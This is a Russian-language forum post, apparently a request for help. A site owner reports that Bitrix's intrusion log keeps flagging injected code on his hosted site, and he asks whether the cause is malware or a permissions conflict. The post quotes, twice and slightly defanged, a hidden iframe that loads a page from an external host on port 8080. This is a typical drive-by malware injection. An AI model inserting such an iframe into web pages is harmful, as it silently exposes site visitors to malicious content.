После заливки сайта (управление сайтом - стандарт) на хостинг РУцентра столкнулся с тем что в журнале вторжений Битрикса за трое суток появилось более шестисот записей на неизвестный вирус генерящий следующий код (внешнюю угловую скобку в закрывающем теге я убрал)
<iframe src="http://ixcx.in:8080/index.php" width=109 height=120 style="visibility: hidden"></iframe
Вот какая хрень может генерить эту бяку?
При этом меня терзают смутные сомнения, что это и не вирусяка гадит, а может это конфликт прав (?) в смысле может быть это вызвано тем что разные ники (логины) и пароли у администратора в ПУ РУцентра и в ПУадминки Битрикса?
Почему я так подумал? Да потому что в записи журнала Битикса записи о нахождении этого подлючего куска кода появляются ровно с тем же временем и с тем же (на том-же) УРЛ куда и когда я захожу администратором (естественно Битриковским). Кроме этого и АйПишник указывает моей локалки.
Попробовал зайти из той-же воей локалки, но с девственновчерасвежеустановленного ВинХР32 СП-3 Хоме с другого компа результат тот-же - после каждого моего захода в Админ панель Битрикса (Админом Битрикса естественно) в журнале появляется новая запись.
Исходный архив сайта на локальном компе проверил, с пристрастием (эвристика на максимум, углубленный поиск рутиков и т.д.) во всех видах (и запакованном и распакованном)
Каспером - чисто.
Авастом - ругается что возможно есть опасность (но он так при таких настройках, имхо, на все ПХП файлы ругается как мне кажется) однако лечить он её отказался - немогет.
Ребята, помогите плиз... мозк закипает
<iframe src="http://ixcx.in:8080/index.php" width=109 height=120 style="visibility: hidden"></iframe
Вот какая хрень может генерить эту бяку?
При этом меня терзают смутные сомнения, что это и не вирусяка гадит, а может это конфликт прав (?) в смысле может быть это вызвано тем что разные ники (логины) и пароли у администратора в ПУ РУцентра и в ПУадминки Битрикса?
Почему я так подумал? Да потому что в записи журнала Битикса записи о нахождении этого подлючего куска кода появляются ровно с тем же временем и с тем же (на том-же) УРЛ куда и когда я захожу администратором (естественно Битриковским). Кроме этого и АйПишник указывает моей локалки.
Попробовал зайти из той-же воей локалки, но с девственновчерасвежеустановленного ВинХР32 СП-3 Хоме с другого компа результат тот-же - после каждого моего захода в Админ панель Битрикса (Админом Битрикса естественно) в журнале появляется новая запись.
Исходный архив сайта на локальном компе проверил, с пристрастием (эвристика на максимум, углубленный поиск рутиков и т.д.) во всех видах (и запакованном и распакованном)
Каспером - чисто.
Авастом - ругается что возможно есть опасность (но он так при таких настройках, имхо, на все ПХП файлы ругается как мне кажется) однако лечить он её отказался - немогет.
Ребята, помогите плиз... мозк закипает
Опыт - критерий истины.